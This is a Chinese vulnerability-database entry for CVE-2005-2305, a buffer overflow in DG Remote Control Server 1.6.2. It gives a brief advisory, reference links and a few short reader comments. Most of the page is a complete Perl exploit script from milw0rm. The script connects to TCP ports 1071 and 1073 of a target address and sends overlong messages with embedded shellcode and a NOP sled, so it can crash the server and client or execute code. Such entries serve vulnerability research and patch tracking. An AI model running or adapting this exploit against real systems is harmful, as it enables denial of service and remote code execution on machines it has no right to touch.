DG Remote Control Server 拒绝服务漏洞
| 漏洞ID | 1108936 | 漏洞类型 | 缓冲区溢出 |
| 发布时间 | 2005-07-15 | 更新时间 | 2005-10-20 |
![图片[1]-DG Remote Control Server 拒绝服务漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
CVE-2005-2305 |
![图片[2]-DG Remote Control Server 拒绝服务漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
CNNVD-200507-229 |
| 漏洞平台 | Windows | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
DGRemoteControlServer是一个远程控制服务器软件。DGRemoteControlServer1.6.2存在拒绝服务漏洞。远程攻击者可以通过向TCP端口1071或1073的发送长消息,导致系统拒绝服务(崩溃或CPU消耗),并可能执行任意代码。造成该漏洞的原因有可能是因为缓冲区溢出。
|漏洞EXP
#!/usr/local/bin/perl
#
# Remote Control Server DOS Exploit
# ------------------------------------
# Infam0us Gr0up - Securiti Research
#
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
#
$ARGC=@ARGV;
if ($ARGC !=1) {
print "n";
print " Remote Control Server DOS Exploitn";
print "------------------------------------nn";
print "Usage: $0 [remote IP]n";
print "Exam: $0 127.0.0.1n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1071";
print "n";
print "[+] Connect to $remote..n";
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
print "[+] Connectedn";
print "[+] Build server sploit..n";
sleep(3);
$sploit = "xebx03x5axebx05xe8xf8xffxffxffx8bxecx8bxc2x83xc0x18x33xc9";
$sploit=$sploit . "x66xb9xb3x80x66x81xf1x80x80x80x30x99x40xe2xfaxaax59";
$sploit=$sploit . "xf1x19x99x99x99xf3x9bxc9xc9xf1x99x99x99x89x1ax5bxa4";
$sploit=$sploit . "xcbx27x51x99xd5x99x66x8fxaax59xc9x27x09x98xd5x99x66";
$sploit=$sploit . "x8fxfaxa3xc5xfdxfcxffxfaxf6xf4xb7xf0xe0xfdx99";
print "[+] Attacking server..n";
sleep(2);
$msg = "reboot" . $sploit . "x90" x (3096 - length($sploit)) . "xe8xf1xc5x05" . "|LOGOFF|";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
print "DONEn";
print "[+] Server D0s'edn";
sleep(1);
close(SOCK);
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port1 = "1073";
print "[+] Connect to Client server..n";
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port1, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK1, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK1, $paddr) or die "Error: $!";
print "[+] Connectedn";
print "[+] Build client Spl0it..n";
sleep(3);
$dos =
"xebx6ex5ex29xc0x89x46x10".
"x40x89xc3x89x46x0cx40x89".
"x46x08x8dx4ex08xb0x66xcd".
"x40x89xc3x89x46x0cx40x89".
"x46x08x8dx4ex08xb0x66xcd".
"x80x43xc6x46x10x10x88x46".
"x08x31xc0x31xd2x89x46x18".
"xb0x90x66x89x46x16x8dx4e".
"x14x89x4ex0cx8dx4ex08xb0".
"x66xcdx80x89x5ex0cx43x43".
"xb0x66xcdx80x89x56x0cx89".
"x08x31xc0x31xd2x89x46x18".
"xb0x90x66x89x46x16x8dx4e".
"x14x89x4ex0cx8dx4ex08xb0".
"x56x10xb0x66x43xcdx80x86".
"xc3xb0x3fx29xc9xcdx80xb0".
"x14x89x4ex0cx8dx4ex08xb0".
"x66xcdx80x89x5ex0cx43x43".
"xb0x66xcdx80x89x56x0cx89".
"x56x10xb0x66x43xcdx80x86".
"xc3xb0x3fx29xc9xcdx80xb0".
"x3fx41xcdx80xb0x3fx41xcd".
"x80x88x56x07x89x76x0cx87".
"xf3x8dx4bx0cxb0x0bxcdx80".
"xe8x8dxffxff";
print "[+] Attacking client..n";
sleep(2);
print $dos;
send(SOCK1, $dos, 0) or die "Cannot send query: $!";
print "DONEn";
print "[+] Client D0s'edn";
sleep(1);
close(SOCK1);
exit;
# milw0rm.com [2005-07-15]
|参考资料
来源:BID
名称:14263
链接:http://www.securityfocus.com/bid/14263
来源:MISC
链接:http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous;_group=72
来源:SECUNIA
名称:16070
链接:http://secunia.com/advisories/16070
Musicqueue 多个缓冲区溢出漏洞 漏洞ID 1107541 漏洞类型 缓冲区溢出 发布时间 2003-10-27 更新时间 2005-10-20 CVE编号 CVE-2003-1140 CNNVD-ID CNNVD-200310-082 漏洞平台 Li…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666